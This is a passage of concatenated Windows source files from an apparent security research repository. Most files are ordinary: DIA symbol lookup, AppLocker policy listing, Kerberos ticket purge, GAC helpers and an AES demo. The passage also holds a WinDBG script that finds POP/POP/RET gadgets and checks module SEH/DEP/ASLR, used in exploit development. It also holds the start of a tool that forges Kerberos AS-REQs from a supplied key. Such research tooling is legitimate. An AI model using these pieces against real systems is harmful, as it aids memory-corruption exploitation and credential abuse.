70 |
--------------------------------------------------------------------------------
/DIA/inc/interface.h:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: interface.h
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Abstraction of the Microsoft Debug Interface Access (DIA) SDK.
9 |
10 | Documentation available at: https://docs.microsoft.com/en-us/visualstudio/debugger/debug-interface-access/debug-interface-access-sdk
11 | Most of the code is based on the Dia2Dump code sample shipped with the MS DIA SDK.
12 | ================================================================================================+*/
13 |
14 | #ifndef __DIA_INTERFACE_H_GUARD__
15 | #define __DIA_INTERFACE_H_GUARD__
16 |
17 | #include
18 |
19 | #include "msdia/include/dia2.h"
20 | #include "msdia/include/cvconst.h"
21 |
22 | #include "callback.h"
23 | #include "dirutil.h"
24 |
25 | // Type definition of the "DllGetClassObject" routine from the msdiaXXX.dll module.
26 | typedef HRESULT(STDMETHODCALLTYPE* TDllGetClassObject)(
27 | _In_ REFCLSID rclsid,
28 | _In_ REFIID riid,
29 | _Out_ LPVOID* ppv
30 | );
31 |
32 | ///
33 | /// Simple structure to store all the information
34 | ///
35 | typedef struct _PUBLIC_SYMBOL {
36 | DWORD dwTag;
37 | DWORD dwRVA;
38 | DWORD dwOff;
39 | DWORD dwSeg;
40 | BSTR Name;
41 | } PUBLIC_SYMBOL, *PPUBLIC_SYMBOL;
42 |
43 |
44 | ///
45 | /// Initialise the COM runtime and IDiaDataSource interface.
46 | ///
47 | HRESULT STDMETHODCALLTYPE
48 | _Must_inspect_result_
49 | _Success_(return == S_OK)
50 | DiaInitialise(
51 | _In_ PWCHAR DllName
52 | );
53 |
54 |
55 | ///
56 | /// Uninitialise the COM runtime and general cleanup.
57 | ///
58 | VOID STDMETHODCALLTYPE DiaUninitialise();
59 |
60 |
61 | ///
62 | /// Load the data from the PDB file provided.
63 | ///
64 |
65 | HRESULT STDMETHODCALLTYPE
66 | _Must_inspect_result_
67 | _Success_(return == S_OK)
68 | DiaLoadDataFromPdb(
69 | _In_ PWCHAR FilePath
70 | );
71 |
72 |
73 | ///
74 | /// Parse the PDB file to find all symbols requested.
75 | ///
76 | HRESULT STDMETHODCALLTYPE
77 | _Must_inspect_result_
78 | _Success_(return == S_OK)
79 | DiaFindPublicSymbols(
80 | _In_ PUBLIC_SYMBOL PublicSymbols[],
81 | _In_ DWORD Elements
82 | );
83 |
84 | #endif // !__DIA_INTERFACE_H_GUARD__
85 |
--------------------------------------------------------------------------------
/WinDBG/exploit86.js:
--------------------------------------------------------------------------------
1 | "use strict";
2 |
3 | function initializeScript() {
4 | return [new host.apiVersionSupport(1, 7)];
5 | }
6 |
7 | function FindPPR(beginning, end) {
8 | var DbgPrint = host.diagnostics.debugLog;
9 | DbgPrint("[>] Searching for POP/POP/RET in given memory region ...\n");
10 |
11 | if (end < beginning) {
12 | DbgPrint("Invalid beginning end region provided!\n");
13 | return;
14 | }
15 |
16 | var length = end - beginning;
17 | var MemoryRegion = host.memory.readMemoryValues(beginning, length);
18 |
19 | var cx = 0x00;
20 | for (; cx < length; cx++) {
21 |
22 | var b1 = MemoryRegion[cx];
23 | var b2 = MemoryRegion[cx + 1];
24 | var b3 = MemoryRegion[cx + 2];
25 | if (b3 != 0xC3)
26 | continue;
27 |
28 | if (b1 >= 0x58 && b1 <= 0x5F && b1 != 0x5C) {
29 | if (b2 >= 0x58 && b2 <= 0x5F && b2 != 0x5C) {
30 |
31 |
32 | DbgPrint(
33 | "0x" + Number(beginning + cx).toString(16) + "\t" +
34 | _FindPPRInternal(b1) + "; " + _FindPPRInternal(b2) + "; ret (" +
35 | Number(b1).toString(16) + Number(b2).toString(16) + Number(b3).toString(16) + ")\n"
36 | );
37 | }
38 | }
39 | }
40 | }
41 |
42 | function _FindPPRInternal(byte) {
43 | switch (byte){
44 | case 0x58:
45 | return "pop eax";
46 | case 0x59:
47 | return "pop ecx";
48 | case 0x5A:
49 | return "pop edx";
50 | case 0x5B:
51 | return "pop ebx";
52 | case 0x5D:
53 | return "pop ebp";
54 | case 0x5E:
55 | return "pop esi";
56 | case 0x5F:
57 | return "pop edi";
58 | }
59 | }
60 |
61 | function GetModulesCharacteristics(IncludeSystem32) {
62 | var DbgPrint = host.diagnostics.debugLog;
63 | DbgPrint("[>] Listing current process modules characteristics ...\n");
64 |
65 | var Modules = host.currentProcess.Modules;
66 | for (var Module of Modules) {
67 | if (!IncludeSystem32 && Module.Name.toLowerCase().indexOf("system32") !== -1)
68 | continue;
69 |
70 | var DllCharacteristics = Module.Contents.Headers.OptionalHeader.DllCharacteristics;
71 | var SEH = (DllCharacteristics & 1024) === 1024 ? "TRUE " : "FALSE";
72 | var DEP = (DllCharacteristics & 256) === 256 ? "TRUE " : "FALSE";
73 | var ASLR = (DllCharacteristics & 64) === 64 ? "TRUE " : "FALSE";
74 |
75 | DbgPrint(
76 | "0x" + Number(Module.BaseAddress).toString(16) + "\t" +
77 | "0x" + Number(Module.BaseAddress + Module.Size).toString(16) + "\t" +
78 | SEH + "(SEH)\t" +
79 | DEP + "(DEP)\t" +
80 | ASLR + "(ASLR)\t" +
81 | Module.Name + "\n"
82 | );
83 | }
84 | }
85 |
--------------------------------------------------------------------------------
/Fusion/FindAssembly/FindAssembly.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {3B49B239-4005-4F25-9E39-522C61B980BE}
8 | Exe
9 | FindAssembly
10 | FindAssembly
11 | v4.8
12 | 512
13 | true
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 | false
27 |
28 |
29 | AnyCPU
30 | pdbonly
31 | true
32 | bin\Release\
33 | TRACE
34 | prompt
35 | 4
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
--------------------------------------------------------------------------------
/Cryptography/AES CNG/source/Main.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #ifndef WIN32_LEAN_AND_MEAN
3 | #define WIN32_LEAN_AND_MEAN
4 | #endif
5 | #ifndef NOCOMM
6 | #define NOCOMM
7 | #endif
8 | #include
9 | #include
10 | #include
11 | #include
12 |
13 | #include "nthelpers.h"
14 | #include "AES.h"
15 | #include "Util.h"
16 |
17 | std::string EasyEncrypt(std::string sPlaintext) {
18 | CNG::Util::WriteInfoMessage(L"Initialising AESEncrypt object\n");
19 | CNG::AESEncrypt* encrypt = new CNG::AESEncrypt();
20 | if (encrypt->Initialise() == FALSE) {
21 | CNG::Util::WriteErrorMessage(L"Unable to initialise AESEncrypt module\n");
22 | return "";
23 | }
24 |
25 | // Encrypt the string
26 | CNG::Util::WriteInfoMessage(L"Encrypt the string\n");
27 | encrypt->SetStringToEncrypt(sPlaintext);
28 | if (encrypt->Encrypt() == FALSE) {
29 | CNG::Util::WriteErrorMessage(L"Error while encrypting the string\n");
30 | return "";
31 | }
32 |
33 | // Get the base64 string
34 | std::string sBase64String = encrypt->GetEncryptedBase64String();
35 |
36 | // Cleanup
37 | if (encrypt)
38 | encrypt->~AESEncrypt();
39 |
40 | return sBase64String;
41 | }
42 |
43 | std::string EasyDecrypt(std::string sCipherText) {
44 | CNG::Util::WriteInfoMessage(L"Initialising AESDecrypt object\n");
45 | CNG::AESDecrypt* decrypt = new CNG::AESDecrypt();
46 | if (decrypt->Initialise() == FALSE) {
47 | CNG::Util::WriteErrorMessage(L"Unable to initialise AESDecrypt module\n");
48 | return "";
49 | }
50 |
51 | // Decrypt the string
52 | CNG::Util::WriteInfoMessage(L"Decrypt the string\n");
53 | decrypt->SetBase64StringToDecrypt(sCipherText);
54 | if (decrypt->Decrypt() == FALSE) {
55 | CNG::Util::WriteErrorMessage(L"Error while decrypting the string\n");
56 | return "";
57 | }
58 |
59 | // Get the decrypted string
60 | std::string sPlaintext = decrypt->GetDecryptedString();
61 |
62 | // Cleanup
63 | if (decrypt)
64 | decrypt->~AESDecrypt();
65 |
66 | return sPlaintext;
67 | }
68 |
69 | int wmain(int argc, wchar_t* argv[]) {
70 | // Parameters are not used
71 | UNREFERENCED_PARAMETER(argc);
72 | UNREFERENCED_PARAMETER(argv);
73 |
74 | CNG::Util::WriteInfoMessage(L"Windows Cryptography API Next Generation - Example\n");
75 | CNG::Util::WriteInfoMessage(L"Documentation: https://docs.microsoft.com/en-us/windows/win32/seccng/cng-portal\n");
76 | CNG::Util::WriteMessage(L" ---------------------------------------------------------------------------------\n\n");
77 |
78 | std::string sPlaintext = "cum lux abest, tenebrae vincunt";
79 |
80 | // Encrypt
81 | std::string sB64CipherText = EasyEncrypt(sPlaintext);
82 | CNG::Util::WriteSuccessMessage(L"Base64 cipher:\n");
83 | std::cout << "\t" << sB64CipherText << std::endl << std::endl << std::endl;
84 |
85 | // Decrypt
86 | std::string sCipherTextDecrypted = EasyDecrypt(sB64CipherText);
87 | CNG::Util::WriteSuccessMessage(L"Plaintext: \n");
88 | std::cout << "\t" << sCipherTextDecrypted << std::endl;
89 |
90 | return 1;
91 | }
--------------------------------------------------------------------------------
/Fusion/ListAssemblies/gacutil.h:
--------------------------------------------------------------------------------
1 | /**
2 | * @file gacutil.h
3 | * @data 06-09-2020
4 | * @author Paul Laîné (@am0nsec)
5 | * @version 1.0
6 | * @brief Global Assembly Cache Utilities.
7 | * @details
8 | * @link https://github.com/am0nsec/wspe
9 | * @copyright This project has been released under the GNU Public License v3 license.
10 | */
11 | #include
12 | #include
13 |
14 | #ifndef _GACUTIL_H
15 | #define _GACUTIL_H
16 |
17 | //-------------------------------------------------------------------------------------------------
18 | // Macro
19 | //-------------------------------------------------------------------------------------------------
20 | #ifdef _WIN64
21 | #define FUSION_MODULE_PATH L"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\fusion.dll"
22 | #else
23 | #define FUSION_MODULE_PATH L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\fusion.dll"
24 | #endif // !_WIN64
25 |
26 | //-------------------------------------------------------------------------------------------------
27 | // Type definition
28 | //-------------------------------------------------------------------------------------------------
29 | typedef struct _ASSEMBLY_VERSION {
30 | WORD dwMajor;
31 | WORD dwMinor;
32 | WORD dwBuild;
33 | WORD dwRevision;
34 | } ASSEMBLY_VERSION, * PASSEMBLY_VERSION;
35 |
36 | typedef IAssemblyEnum* PIAssemblyEnum;
37 | typedef PIAssemblyEnum* PPIAssemblyEnum;
38 |
39 | typedef IAssemblyCache* PIAssemblyCache;
40 | typedef PIAssemblyCache* PPIAssemblyCache;
41 |
42 | typedef IAssemblyName* PIAssemblyName;
43 | typedef PIAssemblyName* PPIAssemblyName;
44 |
45 | //-------------------------------------------------------------------------------------------------
46 | // Fusion function prototype
47 | //-------------------------------------------------------------------------------------------------
48 | typedef HRESULT(WINAPI* CreateAssemblyEnumFunc)(
49 | _Out_ PPIAssemblyEnum pEnum,
50 | _In_ IUnknown* pUnkReserved,
51 | _In_ PIAssemblyName pName,
52 | _In_ DWORD dwFlags,
53 | _In_ LPVOID pvReserved
54 | );
55 |
56 | typedef HRESULT(WINAPI* CreateAssemblyCacheFunc)(
57 | _Out_ IAssemblyCache** ppAsmCache,
58 | _In_ DWORD dwReserved
59 | );
60 |
61 | //-------------------------------------------------------------------------------------------------
62 | // Function prototype
63 | //-------------------------------------------------------------------------------------------------
64 | HRESULT ParseAllAssemblies(
65 | _In_ PPIAssemblyEnum ppIAssemblyEnum,
66 | _In_ PPIAssemblyCache ppIAssemblyCache
67 | );
68 |
69 | HRESULT GetAssemblyName(
70 | _In_ PPIAssemblyName ppIAssemblyName,
71 | _Out_ LPWSTR* pwszAssemblyName
72 | );
73 |
74 | HRESULT GetAssemblyGACPath(
75 | _In_ PPIAssemblyCache ppIAssemblyCache,
76 | _In_ LPWSTR* pwszAssemblyName,
77 | _Out_ LPWSTR* pwszAssemblyGacPath
78 | );
79 |
80 | HRESULT GetAssemblyVersion(
81 | _In_ PPIAssemblyName ppIAssemblyName,
82 | _Out_ PASSEMBLY_VERSION pAssemblyVersion
83 | );
84 |
85 | #endif // !_GACUTIL_H
86 |
--------------------------------------------------------------------------------
/Kerberos/Purge/src/main.c:
--------------------------------------------------------------------------------
1 |
2 | #include
3 | #include
4 | #include
5 |
6 | #pragma comment(lib, "ntdll.lib")
7 | #pragma comment(lib, "Secur32.lib")
8 |
9 | #define STATUS_SUCCESS 0x00000000
10 | #define STATUS_PRIVILEGE_NOT_HELD 0xC0000061
11 | #define STATUS_NOT_SUPPORTED 0xC00000BB
12 | #define STATUS_NO_TOKEN 0xC000007C
13 |
14 | #ifndef NT_ERROR
15 | #define NT_ERROR(Status) ((((ULONG)(Status)) >> 30) == 3)
16 | #endif
17 |
18 | #ifndef NT_SUCCESS
19 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
20 | #endif
21 |
22 | ///
23 | /// Get an handle to the LSA process via untrusted connection and retrive the "Kerberos" authentication package ID.
24 | ///
25 | /// Pointer to the LSA handle
26 | /// Pointer to the authentication package ID.
27 | /// Whether the function was successful
28 | NTSTATUS GetLsaHandleAndPackageId(
29 | _Out_ PHANDLE phLsaHandle,
30 | _Out_ PULONG pAuthenticationPackage
31 | ) {
32 | NTSTATUS Status = STATUS_SUCCESS;
33 | Status = LsaConnectUntrusted(phLsaHandle);
34 | if (NT_ERROR(Status))
35 | return Status;
36 |
37 | LSA_STRING PackageName = { 0x00 };
38 | RtlInitString(&PackageName, "Kerberos");
39 |
40 | return LsaLookupAuthenticationPackage(*phLsaHandle, (PLSA_STRING)&PackageName, pAuthenticationPackage);
41 | }
42 |
43 |
44 | INT main() {
45 | // 1. Get LUID informaiton
46 | HANDLE hProcessHandle = GetCurrentProcess();
47 | HANDLE hTokenHandle = INVALID_HANDLE_VALUE;
48 | BOOL Result = OpenProcessToken(hProcessHandle, 0x2000000u, &hTokenHandle);
49 |
50 | TOKEN_STATISTICS Statistics = { 0x00 };
51 | DWORD dwReturnedLength = 0x00;
52 | Result = GetTokenInformation(hTokenHandle, TokenStatistics, &Statistics, sizeof(TOKEN_STATISTICS), &dwReturnedLength);
53 | if (!Result) {
54 | CloseHandle(hTokenHandle);
55 | return EXIT_FAILURE;
56 | }
57 | wprintf(L"Current LogonId is %d:0x%08x\n",
58 | Statistics.ModifiedId.HighPart,
59 | Statistics.ModifiedId.LowPart
60 | );
61 | CloseHandle(hTokenHandle);
62 |
63 | // 2. Connect to LSA and get the package ID
64 | NTSTATUS Status = STATUS_SUCCESS;
65 | HANDLE hLsaHandle = INVALID_HANDLE_VALUE;
66 | ULONG AuthPackageKerberos = 0x00;
67 |
68 | Status = GetLsaHandleAndPackageId(&hLsaHandle, &AuthPackageKerberos);
69 | if (NT_ERROR(Status))
70 | return EXIT_FAILURE;
71 |
72 | // 3. Purge all tickets
73 | wprintf(L"\tDeleting all tickets:");
74 |
75 | NTSTATUS PackageStatus = STATUS_SUCCESS;
76 |
77 | KERB_PURGE_TKT_CACHE_REQUEST PurgeRequest = { 0x00 };
78 | PurgeRequest.MessageType = KerbPurgeTicketCacheMessage;
79 | PurgeRequest.LogonId.LowPart = 0x00;
80 | PurgeRequest.LogonId.HighPart = 0x00;
81 |
82 | PVOID PurgeResponse = NULL;
83 | ULONG ulBufferSize = 0x00;
84 |
85 | Status = LsaCallAuthenticationPackage(
86 | hLsaHandle,
87 | AuthPackageKerberos,
88 | &PurgeRequest,
89 | sizeof(KERB_PURGE_TKT_CACHE_REQUEST),
90 | &PurgeResponse,
91 | &ulBufferSize,
92 | &PackageStatus
93 | );
94 | if (NT_SUCCESS(Status) && NT_SUCCESS(PackageStatus))
95 | wprintf(L"Ticket(s) purged!\r\n");
96 |
97 | // x. Cleanup and exit
98 | exit:
99 | LsaDeregisterLogonProcess(hLsaHandle);
100 | return EXIT_SUCCESS;
101 | }
--------------------------------------------------------------------------------
/AppLocker/List Policies/main.c:
--------------------------------------------------------------------------------
1 | /**
2 | * @file main.c
3 | * @date 02-08-2020
4 | * @author Paul Laîné (@am0nsec)
5 | * @version 1.0
6 | * @brief Enumerate AppLocker policies via IAppIdPolicyHandler COM interface.
7 | * @details
8 | * @link https://ntamonsec.blogspot.com/
9 | *
10 | * @copyright This project has been released under the GNU Public License v3 license.
11 | */
12 | #include
13 | #include
14 | #include "interfaces.h"
15 |
16 | #define APPLOCKER_MODE_LOCAL 0x01 // Application will retrieve the local AppLocker policies.
17 | #define APPLOCKER_MODE_DOMAIN 0x02 // Application will retrieve the domain AppLocker policies .
18 | #define APPLOCKER_MODE_EFFECTIVE 0x03 // Application will retrieve the effective AppLocker policies.
19 |
20 | /**
21 | * @brief Return the help banner of the application.
22 | */
23 | VOID ShowUsage() {
24 | wprintf(L"usage: applocker.exe [-l|-e|-d] {ldap query}\n");
25 | wprintf(L"\t-l\t\tList local AppLocker policies. Default mode.\n");
26 | wprintf(L"\t-e\t\tList effective AppLocker policies.\n");
27 | wprintf(L"\t-d\t\tList domain AppLocker policies. In this case the last parameter is the LDAP path.\n\n");
28 |
29 | wprintf(L"examples:\n");
30 | wprintf(L"\tapplocker.exe -e\n");
31 | wprintf(L"\tapplocker.exe -l\n");
32 | wprintf(L"\tapplocker.exe -d \"DC=example,DC=com\"\n");
33 | }
34 |
35 | /**
36 | * @brief Get the local, domain or effective AppLocker policies.
37 | * @param pwAppLockerMode One of the following mode: APPLOCKER_MODE_LOCAL, APPLOCKER_MODE_DOMAIN or APPLOCKER_MODE_EFFECTIVE.
38 | * @param pbstrLdapPath The LPAP search path in case domain AppLocker policies have to be retrieved,
39 | * @param pbstrPolicies The retrieved AppLocker policies.
40 | * @return Whether the policies have been successfully retrieved.
41 | */
42 | BOOL GetAppLockerPolicies(PWORD pwAppLockerMode, LPBSTR pbstrLdapPath, LPBSTR pbstrPolicies) {
43 | BOOL bResult = FALSE;
44 | HRESULT result = S_FALSE;
45 | result = CoInitialize(NULL);
46 | if (result != S_OK)
47 | return FALSE;
48 |
49 | // Get the COM interface
50 | IAppIdPolicyHandler* pIAppIdPolicyHandler = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(IAppIdPolicyHandler));
51 | result = CoCreateInstance(&CLSID_AppIdPolicyHandlerClass, NULL, CLSCTX_INPROC_SERVER, &IID_IAppIdPolicyHandler, &pIAppIdPolicyHandler);
52 | if (result != S_OK || pIAppIdPolicyHandler == NULL)
53 | goto failure;
54 |
55 | // Get the AppLocker policies
56 | switch (*pwAppLockerMode) {
57 | case APPLOCKER_MODE_LOCAL:
58 | case APPLOCKER_MODE_DOMAIN:
59 | result = pIAppIdPolicyHandler->lpVtbl->GetPolicy(pIAppIdPolicyHandler, *pbstrLdapPath, pbstrPolicies);
60 | break;
61 |
62 | case APPLOCKER_MODE_EFFECTIVE:
63 | result = pIAppIdPolicyHandler->lpVtbl->GetEffectivePolicy(pIAppIdPolicyHandler, pbstrPolicies);
64 | break;
65 | }
66 |
67 | // Check if an error occurred
68 | if (result != S_OK || *pbstrPolicies == NULL)
69 | goto failure;
70 |
71 | bResult = TRUE;
72 | failure:
73 | if (pIAppIdPolicyHandler) {
74 | pIAppIdPolicyHandler->lpVtbl->Release(pIAppIdPolicyHandler);
75 | pIAppIdPolicyHandler = NULL;
76 | }
77 | CoUninitialize();
78 | return bResult;
79 | }
80 |
81 | /**
82 | * @brief Entry point of the application.
83 | * @param argc Number of command line arguments.
84 | * @param argv Command line arguments.
85 | * @return The execution status code.
86 | */
87 | INT wmain(INT argc, PWCHAR argv[]) {
88 | // Banner
89 | wprintf(L"List local, domain and effective AppLocker policies\n");
90 | wprintf(L"Copyright (C) 2020 Paul Laine (@am0nsec)\n");
91 | wprintf(L"https://ntamonsec.blogspot.com/\n\n");
92 |
93 | // Variable early definition
94 | INT iStatusCode = 1;
95 | WORD wAppLockerMode = APPLOCKER_MODE_LOCAL;
96 | BSTR bstrLdapPath = NULL;
97 |
98 | // Parse user arguments
99 | if (argc < 2) {
100 | ShowUsage();
101 | return;
102 | }
103 | if (wcscmp(argv[1], L"-l") == 0)
104 | wAppLockerMode = APPLOCKER_MODE_LOCAL;
105 | else if (wcscmp(argv[1], L"-e") == 0)
106 | wAppLockerMode = APPLOCKER_MODE_EFFECTIVE;
107 | else if (wcscmp(argv[1], L"-d") == 0 && argc >= 3) {
108 | wAppLockerMode = APPLOCKER_MODE_DOMAIN;
109 | bstrLdapPath = SysAllocString(argv[2]);
110 | }
111 | else {
112 | ShowUsage();
113 | return;
114 | }
115 |
116 | // Get the AppLocker Policies
117 | BSTR bstrAppLockerPolicies = NULL;
118 | if (GetAppLockerPolicies(&wAppLockerMode, &bstrLdapPath, &bstrAppLockerPolicies)) {
119 | printf("AppLocker policies: \n%S\n", bstrAppLockerPolicies);
120 | return 0;
121 | }
122 |
123 | return 1;
124 | }
125 |
--------------------------------------------------------------------------------
/DIA/src/main.c:
--------------------------------------------------------------------------------
1 | /*+================================================================================================
2 | Module Name: main.c
3 | Author : Paul L. (@am0nsec)
4 | Origin : https://github.com/am0nsec/wspe/
5 | Copyright : This project has been released under the GNU Public License v3 license.
6 |
7 | Abstract:
8 | Application entry point.
9 |
10 | ================================================================================================+*/
11 |
12 | #include
13 |
14 | #include "interface.h"
15 |
16 | // Macro to make the code less bloated
17 | #define EXIT_ON_FAILURE(ex) if (!SUCCEEDED(ex)) { return EXIT_FAILURE; }
18 |
19 | #define ADD_TABLE_ENTRY(str) { 0x00, 0x00, 0x00, 0x00, str }
20 |
21 | VOID SortTable(
22 | _In_ PUBLIC_SYMBOL PublicSymbols[],
23 | _In_ DWORD Elements
24 | ) {
25 | // Sort with segment
26 | for (DWORD cx = 0x00; cx < (Elements - 1); cx++) {
27 | for (DWORD dx = 0x00; dx < (Elements - cx - 1); dx++) {
28 | if (PublicSymbols[dx].dwSeg > PublicSymbols[dx + 1].dwSeg) {
29 |
30 | PUBLIC_SYMBOL Temp = PublicSymbols[dx];
31 | RtlCopyMemory(&Temp, &PublicSymbols[dx], sizeof(PUBLIC_SYMBOL));
32 | RtlCopyMemory(&PublicSymbols[dx], &PublicSymbols[dx + 1], sizeof(PUBLIC_SYMBOL));
33 | RtlCopyMemory(&PublicSymbols[dx + 1], &Temp, sizeof(PUBLIC_SYMBOL));
34 | }
35 | }
36 | }
37 |
38 | // Sort with RVA
39 | for (DWORD cx = 0x00; cx < (Elements - 1); cx++) {
40 | for (DWORD dx = 0x00; dx < (Elements - cx - 1); dx++) {
41 | if (PublicSymbols[dx].dwRVA > PublicSymbols[dx + 1].dwRVA) {
42 |
43 | PUBLIC_SYMBOL Temp = PublicSymbols[dx];
44 | RtlCopyMemory(&Temp, &PublicSymbols[dx], sizeof(PUBLIC_SYMBOL));
45 | RtlCopyMemory(&PublicSymbols[dx], &PublicSymbols[dx + 1], sizeof(PUBLIC_SYMBOL));
46 | RtlCopyMemory(&PublicSymbols[dx + 1], &Temp, sizeof(PUBLIC_SYMBOL));
47 | }
48 | }
49 | }
50 | }
51 |
52 | ///
53 | /// Application Entry Point.
54 | ///
55 | /// Exit status code.
56 | INT main(VOID) {
57 | // Banner
58 | wprintf(L"=================================================================\r\n");
59 | wprintf(L"Module Name: Microsoft Debug Interface Access (DIA) Experiments \r\n");
60 | wprintf(L"Author : Paul L. (@am0nsec) \r\n");
61 | wprintf(L"Origin : https://github.com/am0nsec/wspe/ \r\n\r\n");
62 | wprintf(L"Tested OS : Windows 10 (20h2) - 19044.1706 \r\n");
63 | wprintf(L"=================================================================\r\n\r\n");
64 |
65 | // Initialise COM runtime and get IDiaDataSource interface.
66 | wprintf(L"[*] Initialise MSDIA \r\n");
67 | EXIT_ON_FAILURE(DiaInitialise(L"msdia140.dll"));
68 |
69 | // Load the data from the PDB
70 | wprintf(L"[*] Open PDB from EXE: C:\\WINDOWS\\System32\\ntoskrnl.exe\r\n");
71 | EXIT_ON_FAILURE(DiaLoadDataFromPdb(L"C:\\WINDOWS\\System32\\ntoskrnl.exe"));
72 |
73 | // Parse all public symbols
74 | PUBLIC_SYMBOL Symbols[] = {
75 | // Memory Manager variables
76 | ADD_TABLE_ENTRY(L"MiState"),
77 | ADD_TABLE_ENTRY(L"MiVisibleState"),
78 | ADD_TABLE_ENTRY(L"MmPteBase"),
79 | ADD_TABLE_ENTRY(L"MmSizeOfNonPagedPoolInBytes"),
80 | ADD_TABLE_ENTRY(L"MmHighestUserAddress"),
81 | ADD_TABLE_ENTRY(L"PoolTrackTable"),
82 | ADD_TABLE_ENTRY(L"ExPoolTagTables"),
83 | ADD_TABLE_ENTRY(L"ExpPoolBlockShift"),
84 | ADD_TABLE_ENTRY(L"ExpSessionPoolTrackTable"),
85 | ADD_TABLE_ENTRY(L"ExpSessionPoolTrackTableSize"),
86 |
87 | // Loader variables
88 | ADD_TABLE_ENTRY(L"PsLoadedModuleList"),
89 |
90 | // Process Manager variables
91 | ADD_TABLE_ENTRY(L"PsActiveProcessHead"),
92 |
93 | // General kernel info
94 | ADD_TABLE_ENTRY(L"KeNumberProcessors")
95 | };
96 | EXIT_ON_FAILURE(DiaFindPublicSymbols(Symbols, _ARRAYSIZE(Symbols)));
97 |
98 | // Display everything to console
99 | SortTable(Symbols, _ARRAYSIZE(Symbols));
100 |
101 | wprintf(L"\r\n");
102 | wprintf(L"Found Segment RVA Offset Name\r\n");
103 | wprintf(L"----- ------- --- ------ ----\r\n");
104 |
105 | DWORD Found = 0x00;
106 | for (DWORD cx = 0x00; cx < _ARRAYSIZE(Symbols); cx++) {
107 | wprintf(L"%s %04X %08X %08X %s\r\n",
108 | Symbols[cx].dwRVA != 0x00 ? L"\033[0;32mY\033[0;37m" : L"\033[0;31mN\033[0;37m",
109 | Symbols[cx].dwSeg,
110 | Symbols[cx].dwRVA,
111 | Symbols[cx].dwOff,
112 | Symbols[cx].Name
113 | );
114 | Found += Symbols[cx].dwRVA != 0x00 ? 1 : 0;
115 | }
116 |
117 | wprintf(L"\r\n");
118 | wprintf(L"Found: %i\r\n", Found);
119 | wprintf(L"Missing: %i\t\n", (_ARRAYSIZE(Symbols) - Found));
120 |
121 | // Uninitialise COM runtime and general cleanup
122 | DiaUninitialise();
123 | return EXIT_SUCCESS;
124 | }
--------------------------------------------------------------------------------
/Kerberos/AskTGT/main.c:
--------------------------------------------------------------------------------
1 |
2 | #include "socket.h"
3 |
4 | //#include
5 | #include
6 | #include
7 | #include
8 | #include
9 | #include
10 |
11 | #include "kerberos.h"
12 |
13 | #pragma comment(lib, "NetApi32.lib")
14 | #pragma comment(lib, "ntdll.lib")
15 | #pragma comment(lib, "netapi32.lib")
16 |
17 | ///
18 | /// Get the information related to the primary domain controller.
19 | ///
20 | /// Server to query
21 | /// Domain to query
22 | /// Pointer to the PDOMAIN_CONTROLLER_INFOW pointer of structure
23 | /// Whether the function executed successfully
24 | NTSTATUS GetDomainControllerInformation(
25 | _In_opt_ LPCSTR ServerName,
26 | _In_opt_ LPCSTR DomainName,
27 | _Inout_ PDOMAIN_CONTROLLER_INFOA* DCInformation
28 | ) {
29 | // Get the informations
30 | DWORD Status = DsGetDcNameA(
31 | ServerName,
32 | DomainName,
33 | NULL,
34 | NULL,
35 | (DS_FORCE_REDISCOVERY | DS_IS_DNS_NAME | DS_RETURN_DNS_NAME | DS_KDC_REQUIRED),
36 | DCInformation
37 | );
38 | if (Status != ERROR_SUCCESS)
39 | return STATUS_UNSUCCESSFUL;
40 |
41 | // Fix the domain name and ip address to remove the "\\"
42 | SIZE_T Size1 = strlen((*DCInformation)->DomainControllerName);
43 | SIZE_T Size2 = strlen((*DCInformation)->DomainControllerAddress);
44 |
45 | RtlCopyMemory((*DCInformation)->DomainControllerName, (*DCInformation)->DomainControllerName + 2, Size1 - 2);
46 | RtlCopyMemory((*DCInformation)->DomainControllerAddress, (*DCInformation)->DomainControllerAddress + 2, Size2 - 2);
47 |
48 | (*DCInformation)->DomainControllerName[Size1 - 2] = 0x00;
49 | (*DCInformation)->DomainControllerAddress[Size2 - 2] = 0x00;
50 |
51 | return STATUS_SUCCESS;
52 | }
53 |
54 | NTSTATUS HexStringToHex(
55 | _In_ PCSTR BufferIn,
56 | _Out_ PBYTE* BufferOut,
57 | _Out_ INT32* BufferOutSize
58 | ) {
59 | *BufferOutSize = 0x10;
60 | *BufferOut = calloc(0x01, 0x11);
61 |
62 | UINT32 b = 0x00;
63 | for (INT32 cx = 0x00; cx < 0x10; cx++) {
64 | sscanf(BufferIn + (2 * cx), "%02X", &b);
65 | (*BufferOut)[cx] = (UCHAR)b;
66 | }
67 | (*BufferOut)[0x10] = 0x00;
68 | }
69 |
70 | ///
71 | /// Generate the final AS-REQ
72 | ///
73 | NTSTATUS GenerateASRequest(
74 | _In_ PCSTR Key,
75 | _In_ PCSTR DomainName,
76 | _In_ PCSTR SecurityPrincipal,
77 | _Out_ PBYTE* Request,
78 | _Out_ INT32* RequestSize
79 | ) {
80 | // 1. PVNOP and MSG-TYPE
81 | ASN_ELEMENT Pvno = { 0x00 };
82 | ASN_ELEMENT MessageType = { 0x00 };
83 | KerbGeneratePvnoAndType(&Pvno, &MessageType);
84 |
85 | // 2 Generate and encrypt the timestamp
86 | ASN_ELEMENT EncryptedData = { 0x00 };
87 | KerbGenerateEncryptedData(Key, strlen(Key), &EncryptedData);
88 |
89 | // 3 Generate the PAC element
90 | ASN_ELEMENT Pac = { 0x00 };
91 | KerbGeneratePac(&Pac);
92 |
93 | // 4 Generate REQ-BODY
94 | ASN_ELEMENT ReqBody = { 0x00 };
